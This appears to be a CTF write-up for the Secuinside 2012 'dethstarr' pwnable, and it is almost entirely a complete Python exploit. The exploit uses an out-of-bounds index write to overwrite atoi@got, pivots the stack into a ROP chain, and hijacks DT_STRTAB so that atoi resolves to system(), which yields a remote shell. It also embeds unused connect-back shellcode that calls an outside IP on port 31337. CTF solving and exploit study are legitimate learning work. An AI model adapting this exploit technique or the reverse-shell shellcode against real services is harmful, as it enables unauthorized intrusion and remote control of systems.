
Secuinside 2012 Quals - Dethstarr (Exploit only)

pwn3r_45 2012. 10. 7. 00:49

Category : Pwnables

nickname: dethstarr

 

HINT: 61.42.25.25:8080
(8181,8282,8383,8484,8585,8686,8787,8888,8989)

 

binary: http://61.42.25.25/dethstarr

 

Target environment: CentOS 6.2 with full ASLR (randomize_va_space = 2) and NX / exec-shield enabled. The stack is not executable and libc is randomized, so the exploit below avoids shellcode and libc addresses entirely; it relies only on the binary's own fixed (non-PIE, 0x0804xxxx) addresses.


dethstarr

Summary: an unchecked (out-of-bounds) array index gives a controlled write, which is used to overwrite a GOT entry (atoi@got), pivot the stack into a ROP chain, and finally redirect the dynamic linker's symbol lookup so that "atoi" resolves to system().



#!/usr/bin/python


from socket import *

from struct import pack , unpack

import time

import random


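def h(x):
        """Pack *x* as a 4-byte little-endian word (the exploit's "dword" helper).

        The value is masked to 32 bits before packing, so negative offsets such
        as ``h(-1)`` and addresses/values above 0x7fffffff (``h(0xDFE1ABCC)``,
        ``h(0xcccccccc)``, ``h(0xbfffffbf)`` are all used below) produce the same
        bytes.  The original signed ``'<l'`` format only tolerated the latter on
        old Python 2 builds; newer interpreters raise ``struct.error`` for them.
        """
        return pack('<I', x & 0xffffffff)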


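def g(x):
        """Pack *x* as a 2-byte little-endian word (the exploit's "short" helper).

        Masked to 16 bits for the same reason ``h`` masks to 32: a negative or
        above-0x7fff value packs to the wrapped bytes instead of raising
        ``struct.error`` on newer Pythons.
        """
        return pack('<H', x & 0xffff)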


# Target: the script as published points at a local copy of the service; the
# contest instance was 61.42.25.25 on ports 8181-8989 (see HINT above).
HOST = "127.0.0.1"

PORT = 8181


# NOTE(review): SHELLCODE is never referenced anywhere in this script - it is a
# dead leftover.  Decoding the bytes it looks like a classic x86 Linux
# connect-back shell (socket / connect to 110.8.231.30:31337 / dup2 loop /
# execve "/bin//sh"); presumably abandoned because the target is NX
# (exec-shield), so injected code cannot run.  Kept byte-for-byte; treat the
# embedded IP:port as the author's callback host, not something to reuse.
SHELLCODE = \
"\x31\xdb\xf7\xe3\x53\x43\x53\x6a\x02\x89"+\
"\xe1\xb0\x66\xcd\x80\x5b\x5e\x68\x6e\x08"+\
"\xe7\x1e\x66\x68\x7a\x69\x66\x53\x6a\x10"+\
"\x51\x50\x89\xe1\x43\x6a\x66\x58\xcd\x80"+\
"\x59\x87\xd9\xb0\x3f\xcd\x80\x49\x79\xf9"+\
"\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69"+\
"\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd"+\
"\x80"


# All addresses below are inside the main binary (0x0804xxxx).  It is not PIE,
# so they are stable despite randomize_va_space = 2; nothing in this exploit
# needs a libc address.  Values come from reversing the binary (not shown).
freespace1 = 0x0804adac   # writable scratch area in the binary; the final ROP chain is placed here and esp is pivoted to it
heap_buffer = 0x0804a8e4  # written into every "msg" frame as the fake saved ebp
lift_esp = 0x08049534     # gadget written over atoi@got by payload4_1 (per the author's note there); name suggests it raises esp - TODO confirm
leave_ret = 0x080491fb    # leave ; ret gadget (stack pivot); leave_ret+1 is used below as a plain ret
read_plt = 0x080483f4     # read@plt - used to fetch the final chain and to overwrite DT_STRTAB
write_plt = 0x080483c4    # write@plt - not used by this script
rwx_ptr = 0x804a7b0       # not used by this script
pppr = 0x080495b6         # pop ; pop ; pop ; ret - clears read()'s three arguments in the final chain


# The "Value N" payloads below are request frames for the vulnerable service;
# their field layout mirrors a structure in the binary that is not shown here,
# so the exact meaning of most fields cannot be stated from this file alone.
# Observations that ARE visible in the script:
#   * every frame ends with h(0x1f); 0x1f is also the size of the "msg" frame
#     built further down (likely a length field - verify against the binary);
#   * the frames in each group differ in exactly one or two fields, which is
#     where the controlled index / value of the out-of-bounds write goes;
#   * several constants exceed 0x7fffffff (0xDFE1ABCC, 0xcccccccc,
#     0xbfffffbf, 0xffff0000), so h() must accept full 32-bit values.
# Do not restyle these lines: the byte layout is the exploit.

###################################### Value 1 ########################################
payload1 = h(0xca) + h(0x00) + h(0x01) + h(0xac) + h(0x9a) + h(0x01) + g(0x00) + g(0x00) + g(0x01) + g(0x01) + "INST" + h(0x1f)
########################################################################################


###################################### Value 2 ########################################
# payload2_1..payload2_4 differ only in the 5th dword (0x01, 0x03, 0x04, 0x05);
# payload2_4_2 is payload2_4 with the trailing 0x1f replaced by 0x123 and is
# sent last, after the "Value 4" writes, presumably to trigger the corrupted
# code path - TODO confirm.
payload2_1 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x01) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x1f)

payload2_2 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x03) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x1f)

payload2_3 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x04) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x1f)

payload2_4 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x05) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x1f)


payload2_4_2 = h(0x08) + h(0x01) + h(0x01) + h(0xDFE1ABCC) + h(0x05) + h(0x01) + g(0xff) + g(0x00) + h(-1) + h(0x66) + 'lu' + g(0x00) + h(0xff) + h(0x60) + h(0x01) + h(0x7FFFFFFF) + h(0x9c) + h(0x123)
########################################################################################


####################################### Value 3 ########################################
# payload3_1..payload3_3 differ only in the 10th field (0x01, 0x00, 0x02).
payload3_1 = g(0xcb) + g(0x1a) + g(0xdb) + g(0x02) + h(0x19) + h(0x06) + h(0x00) + h(0xca) + h(0xcccccccc) + h(0x01) + h(0x1f)

payload3_2 = g(0xcb) + g(0x1a) + g(0xdb) + g(0x02) + h(0x19) + h(0x06) + h(0x00) + h(0xca) + h(0xcccccccc) + h(0x00) + h(0x1f)

payload3_3 = g(0xcb) + g(0x1a) + g(0xdb) + g(0x02) + h(0x19) + h(0x06) + h(0x00) + h(0xca) + h(0xcccccccc) + h(0x02) + h(0x1f)
########################################################################################


####################################### Value 4 ########################################
# These are the actual out-of-bounds writes: the first dword is the value, the
# repeated 3rd/4th dword looks like the index, and the 13th dword varies
# (0x03 / 0x00 / 0x00 / 0x02) - all three inferred from the diffs between the
# four frames, verify against the binary.
#   payload4_1: value lift_esp, index 0xbfffffbf -> atoi@got (author's note below)
#   payload4_2: value freespace1, index 8        -> destination of the final chain
#   payload4_3: value 44, index 9                -> its length; 44 == len(attack) built further down
#   payload4_4: value 1, index 0x1f              -> author notes "Nothing"
payload4_1 = h(lift_esp) + h(0x01) + h(0xbfffffbf) + h(0xbfffffbf) + h(0x0a) + h(0x0a) + h(0x01) + h(0xffff) + h(0xffff0000) + h(0x04) + g(0x52) + g(0xe1) + h(0x03) + h(0x1f)
# overwrite atoi@got


payload4_2 = h(freespace1) + h(0x01) + h(0x08) + h(0x08) + h(0x0a) + h(0x0a) + h(0x01) + h(0xffff) + h(0xffff0000) + h(0x04) + g(0x52) + g(0xe1) + h(0x00) + h(0x1f)
# for payload


payload4_3 = h(44) + h(0x01) + h(0x09) + h(0x09) + h(0x0a) + h(0x0a) + h(0x01) + h(0xffff) + h(0xffff0000) + h(0x04) + g(0x52) + g(0xe1) + h(0x00) + h(0x1f)
# for payload


payload4_4 = h(0x01) + h(0x01) + h(0x1f) + h(0x1f) + h(0x0a) + h(0x0a) + h(0x01) + h(0xffff) + h(0xffff0000) + h(0x04) + g(0x52) + g(0xe1) + h(0x02) + h(0x1f)
# Nothing
########################################################################################


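s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))

# Send order matters: the "Value 2/3" frames set up state in the vulnerable
# object, the "Value 4" frames perform the out-of-bounds writes, and
# payload2_4_2 (sent last) triggers the corrupted path.
pList = [
    payload1,
    payload2_1, payload2_2, payload2_3, payload2_4,
    payload3_1, payload3_2, payload3_3,
    payload4_1, payload4_2, payload4_3, payload4_4,
    payload2_4_2,
]

# Payload indexes before which the service sends a reply that must be drained
# first (found empirically, presumably).  The reply content is not used.
recvList = [0, 1, 5, 8, 9, 10, 11]

ddd = ""

# Default "msg" frame: exactly 0x1f bytes; &heap_buffer and the leave;ret
# gadget sit at offsets 13 and 17, where the saved ebp / return address of
# the handler end up - TODO confirm the exact frame layout against the binary.
msg = "a"*(0x1f-18) + h(heap_buffer) + h(leave_ret) + "a"*10

raw_input("gogo? > ")

############################ Send Check Values and Payloads ####################
for idx, payload in enumerate(pList):
    if idx in recvList:
        s.recv(1024)                       # drain the server's reply
        print("[<<] Msg")
        time.sleep(0.5)

    print("[>>] Send Payload  %d" % idx)
    # sendall(): plain send() may write fewer bytes than requested, which
    # would silently corrupt a frame.
    s.sendall(payload)
    time.sleep(0.3)

    print("[>>] Send Msg")

    if idx == 4:                           # payload2_4
        # Pivot frame: fake saved ebp = freespace1-4, a short ret sled
        # (leave_ret+1 is the 'ret' byte of the leave;ret gadget), then
        # read@plt followed by leave;ret, so execution lands in the chain
        # that is later read into freespace1.  Zero-padded to the 0x1f
        # frame size.
        ddd = "aaaa" + h(freespace1-4) + h(leave_ret+1) * 3 + h(read_plt) + h(leave_ret)
        ddd += "\x00"*(0x1f-4*7)
    elif idx == len(pList)-1:              # payload2_4_2: no msg follows it
        break
    else:
        ddd = msg

    s.sendall(ddd)
    time.sleep(0.3)
#################################################################################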


print "good good.."

time.sleep(1)


# Lazy-binding (DT_STRTAB) hijack instead of a libc leak.  With ASLR on, the
# address of system() is unknown, but the non-PIE binary's .dynamic section and
# PLT stubs are fixed.  Overwriting the DT_STRTAB value makes ld.so look up the
# name of "atoi" in OUR buffer, where it finds "system", binds that, and calls
# it with our argument.  Works because atoi has not been resolved yet (lazy
# binding), and needs no libc address at all.
offset = 0x80482bb - 0x0804826c # &"atoi" - &.strtab   -> st_name of atoi relative to the original string table

strtab_ptr = 0x804a704 # &.DYNAMIC + 36   -> d_val of the DT_STRTAB entry (5th Elf32_Dyn, 8 bytes each)

atoi_dyn = 0x804842a # atoi@plt + 6   -> PLT stub past the GOT jump ("push reloc_idx ; jmp resolver"), presumably


############################### Send Final ROP payload ##########################
# Chain that runs at freespace1 after the stack pivot; 44 bytes in total, the
# length programmed by payload4_3:
#   [ 0..20)  read(0, strtab_ptr, 4)   pppr pops the three args afterwards
#   [20..32)  atoi_dyn(freespace1+40)  0xdeadbeef = return address after system(), irrelevant once the shell is up
#   [32..40)  "system\0\0"             the name ld.so will now find for atoi
#   [40..44)  "sh\0\0"                 argument of system()
attack = h(read_plt) + h(pppr) + h(0x0) + h(strtab_ptr) + h(0x4) # read(0 , strtab_ptr , 4)

attack += h(atoi_dyn) + h(0xdeadbeef) + h(freespace1 + 40)

attack += "system\x00\x00" + "sh\x00\x00"


# NOTE(review): send() may short-write; sendall() would be the safe call here.
s.send(attack) # send final payload


# Consumed by the read() in the chain: the new string-table base is chosen so
# that base + offset == &"system" (freespace1 + 32).
s.send(h(freespace1 + 32 - offset)) # send &"system" - offset
#################################################################################


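time.sleep(0.5)

############################### Got SHELL #######################################
# Minimal interactive loop over the raw socket.  Each recv(1024) returns a
# single chunk and blocks until the shell writes something, so a command that
# produces no output (or more than one chunk) will stall / lag by one command;
# that limitation is kept from the original.
while True:
    cmd = raw_input("$ ")
    # sendall(): send() may transmit fewer bytes than the command line.
    s.sendall(cmd + "\n")
    if cmd == "exit":
        break
    print(s.recv(1024))
#################################################################################

s.close()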